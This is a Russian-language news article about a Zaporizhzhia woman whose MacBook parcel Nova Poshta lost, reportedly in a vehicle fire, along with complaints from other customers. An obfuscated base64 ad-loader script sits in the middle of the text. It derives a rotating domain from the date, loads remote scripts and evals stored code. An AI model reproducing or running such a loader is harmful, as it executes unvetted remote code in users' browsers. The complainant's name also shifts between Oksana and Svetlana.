Запорожанка, которая пользуется услугами «Новой почты», рассказала о том, как лишилась посылки за 38 тысяч гривен.
Соответствующий пост Оксана Стрельцова опубликовала в Facebook.
Женщина утверждает, что 1 августа через 11 отделение «Новой почты» в Запорожье она отправила новый ноутбук Macbook Air 13‘‘ 2020. Уже 3 августа ей сообщили, что посылка утеряна вместе с еще тремя другими.
«…При оформлении посылки сотрудник Новой Почты спросил меня, что в посылке. Когда я ответила – ноутбук, он заволновался и поторопился унести его на склад, даже не показав мне, наклеил ли он наклейку «осторожно, хрупкая вещь»…
…Объяснение: форс-мажор в дороге. Что именно подразумевается под форс-мажором мне не рассказывают. Более того, никак не комментируют, КАК могут пропасть ТОЛЬКО 4 ПОСЫЛКИ из всего автомобиля (номер автомобиля 3890). К тому же, мне не разрешают отсмотреть по камерам наблюдения, где находилась посылка, кто и в какое время ее загружал в автомобиль. Не называют и имена сотрудников, находящихся на смене в этот день.» — жалуется Светлана.
Женщина рассказывает, что застраховала посылку на минимальную сумму, так давно пользуется услугами компании и проблем ранее не возникало. В скором времени на пост отреагировали представители «Новой почты»: var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
«Мы проверили информацию по вашему отправлению и, к сожалению, Ваша посылка была в автомобиле, в котором возник пожар. 3 августа вблизи Смелы Черкасской области произошло возгорание автомобиля, перевозившего посылки клиентов. Возгорание вероятно произошло по одной из посылок, которая перевозилась в авто. Мы компенсируем всем клиентам объявленную стоимость грузов, которую они отметили в накладных при отправке. При отправке Вы отметили, что ноутбук стоит 20 грн, при этом мы понимаем, что он не может столько стоить. Можете предоставить чек или документ, подтверждающий стоимость ноутбука, чтобы мы могли пересмотреть сумму компенсации?» — написали в комментарии под постом.
Женщина предоставила соотвествующий чек. Её попросили ожидать информации о возмещении ущерба. Отметим, пользователи сети написали, что сталкивались с аналогичными ситуациями.
«У меня точно такая проблема, 1 августа отправила посылку в Киев, а вчера сама стала звонить узнавать и мне ответили , что она сгорела. Там было очень дорогое лекарство и другие ценные вещи. Не знаю что делать, мне никто ничего не объясняет.Я ее оценила в 1000 грн. Но за эти деньги я его не куплю. Я не знаю что делать, Боже никогда не думала, что на Новой почте могут воровать.» — написала Татьяна Селиверстова.
«Мені відправляли посилку вартість якої 1160 грн , написали , шо згоріла» — рассказывает Ирина Дмитрук. (adsbygoogle = window.adsbygoogle || []).push({});
Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/sgorela-posylka-za-38-tysyach-v-zaporozhe-novaya-pochta-popala-v-skandal-sotsset/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook